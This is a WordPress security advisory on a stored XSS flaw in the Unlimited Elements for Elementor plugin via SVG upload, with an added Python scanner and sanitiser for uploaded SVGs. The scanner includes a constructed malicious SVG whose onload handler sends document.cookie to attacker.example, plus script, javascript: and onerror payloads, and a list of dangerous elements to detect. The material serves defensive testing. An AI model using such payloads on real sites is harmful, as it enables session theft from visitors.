Hong Kong Security Alert: Unlimited Elements XSS (CVE-2025-13692)

Cross-Site Scripting (XSS) in WordPress Unlimited Elements For Elementor (Free Widgets, Addons, Templates) Plugin
Plugin Name: Unlimited Elements For Elementor
Type of Vulnerability: XSS
CVE Number: CVE-2025-13692
Urgency: Medium
CVE Publish Date: 2025-11-27
Source URL: CVE-2025-13692

Urgent Security Advisory: Stored XSS via SVG Upload in “Unlimited Elements for Elementor”

Date: 2025-11-27  |  Author: Hong Kong Security Expert

This advisory describes an unauthenticated stored Cross-Site Scripting (XSS) vulnerability in the “Unlimited Elements for Elementor” plugin affecting versions ≤ 2.0. It is triggered by uploading a crafted SVG which, once stored and served, executes arbitrary JavaScript in visitors’ browsers. The vendor released a fix in 2.0.1. Treat this as a high-priority patch window: automated scanners and opportunistic attackers rapidly probe for upload endpoints of this kind.

Quick summary (for busy site owners)

  • Vulnerability: stored XSS via SVG upload affecting Unlimited Elements for Elementor ≤ 2.0.
  • Fixed in 2.0.1 — update immediately where possible.
  • If patching is delayed: disable SVG uploads, remove untrusted SVGs from uploads, and deploy content-inspection WAF rules to block executable SVG markers.
  • Rotate admin credentials, review logs for suspicious uploads, and follow the detection and recovery steps below if compromise is suspected.

What is the vulnerability (high level)?

SVG is XML and can include executable constructs (scripts, event attributes, embedded HTML). When an application accepts SVG uploads without robust sanitization and later serves them (inline or in pages), the uploaded data becomes a stored XSS vector. This issue allows an unauthenticated attacker to upload a crafted SVG containing executable payloads; any visitor loading the page that includes that SVG may execute the attacker’s JavaScript.

Root causes (typical)

  • Allowing unauthenticated or insufficiently restricted file uploads.
  • Insufficient server‑side sanitization of SVG content (failure to strip script elements, on* event-handler attributes, javascript: URLs in href, and embedded HTML).
  • Serving SVGs in a context where script runs: navigated directly as a document, embedded via <object>, <embed> or <iframe>, or inlined into page markup, and without response headers (a Content-Security-Policy or Content-Disposition: attachment) that would block execution or inline rendering. An SVG referenced only through <img> or a CSS background does not run script, but the file remains reachable at its direct URL.
  • Insufficient access control on upload endpoints.
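The following triage script is an added example written for this advisory; it is not code from the plugin, the vendor, or the original alert. It implements the content inspection the quick summary recommends (find untrusted SVGs in the uploads directory and block executable markers) against the constructs described above: script elements, on* handlers, javascript: URLs (including whitespace-obfuscated ones) and embedded HTML via foreignObject. The malicious SVG and the host attacker.example are constructed for illustration; the uploads path is whatever you point it at (for WordPress, typically wp-content/uploads).

```python
"""Triage SVG uploads for the executable constructs behind stored XSS.

Added example, not code from the plugin or the advisory. It flags the markers
the advisory lists (script elements, on* event attributes, embedded HTML,
javascript: URLs) and can strip them. xml.etree is used to keep the example
dependency-free; for production parsing prefer defusedxml, which also resists
entity-expansion attacks.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Iterable

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # keep <svg xmlns=...> when re-serialising
ET.register_namespace("xlink", XLINK_NS)

# Elements that run script or embed arbitrary HTML inside an SVG document.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Both the plain and the xlink-namespaced href carry URLs in SVG.
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


def _local(name: str) -> str:
    """Strip an XML namespace prefix ({uri}name) and lower-case the result."""
    return name.rsplit("}", 1)[-1].lower()


def _bad_url(elem_name: str, value: str) -> bool:
    """javascript:/vbscript: never belong in an SVG; data: is allowed only on <image>."""
    v = re.sub(r"\s", "", value).lower()   # browsers drop whitespace before scheme parsing
    if v.startswith(("javascript:", "vbscript:")):
        return True
    return v.startswith("data:") and elem_name != "image"


def find_executable_markers(svg_bytes: bytes) -> list[str]:
    """Return human-readable findings; an empty list means nothing executable was found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); treat as suspicious"]
    findings = []
    for elem in root.iter():               # depth-first, document order
        name = _local(elem.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            local_attr = _local(attr)
            if local_attr.startswith("on"):
                findings.append(f"{local_attr} handler on <{name}>")
            elif attr in URL_ATTRS and _bad_url(name, value):
                findings.append(f"{local_attr}={value.strip()[:40]!r} on <{name}>")
    return findings


def sanitize_svg(svg_bytes: bytes) -> bytes:
    """Remove executable elements and attributes; reject documents whose root is not <svg>."""
    root = ET.fromstring(svg_bytes)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    parents = {child: parent for parent in root.iter() for child in parent}
    for elem in list(root.iter()):         # materialise first: the loop mutates the tree
        if _local(elem.tag) in DANGEROUS_ELEMENTS:
            parents[elem].remove(elem)     # drops the whole subtree, nested handlers included
            continue
        for attr in list(elem.attrib):
            if _local(attr).startswith("on") or (
                attr in URL_ATTRS and _bad_url(_local(elem.tag), elem.attrib[attr])
            ):
                del elem.attrib[attr]
    return ET.tostring(root)


def scan_svgs(files: Iterable[tuple[str, bytes]]) -> dict[str, list[str]]:
    """Map each file name to its findings, omitting clean files."""
    return {name: hits for name, data in files if (hits := find_executable_markers(data))}


def scan_upload_dir(upload_dir: str) -> dict[str, list[str]]:
    """Walk an uploads tree (e.g. wp-content/uploads) and report SVGs carrying executable markers."""
    paths = (p for p in Path(upload_dir).rglob("*") if p.suffix.lower() == ".svg")
    return scan_svgs((str(p), p.read_bytes()) for p in paths)


# Constructed samples for illustration; attacker.example is a placeholder host.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100"
     onload="fetch('https://attacker.example/?c=' + document.cookie)">
  <circle cx="50" cy="50" r="40" fill="red"/>
  <script>alert(document.domain)</script>
  <a xlink:href="java&#10;script:alert(1)"><text x="10" y="20">click</text></a>
  <foreignObject width="100" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body>
  </foreignObject>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'

if __name__ == "__main__":
    for name, hits in scan_svgs([("evil.svg", MALICIOUS_SVG), ("logo.svg", BENIGN_SVG)]).items():
        print(name)
        for hit in hits:
            print("  -", hit)
    print(sanitize_svg(MALICIOUS_SVG).decode())
```

Run `scan_upload_dir("/var/www/html/wp-content/uploads")` to list files to quarantine; prefer deleting or quarantining a flagged upload over sanitising it in place, since sanitisation keeps an attacker-controlled file on the origin. The detector deliberately treats unparseable XML as a finding: a file that fails strict XML parsing may still be rendered by a lenient browser when served as text/html.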

Why SVGs are risky

SVG is not a passive image format. It is XML that supports: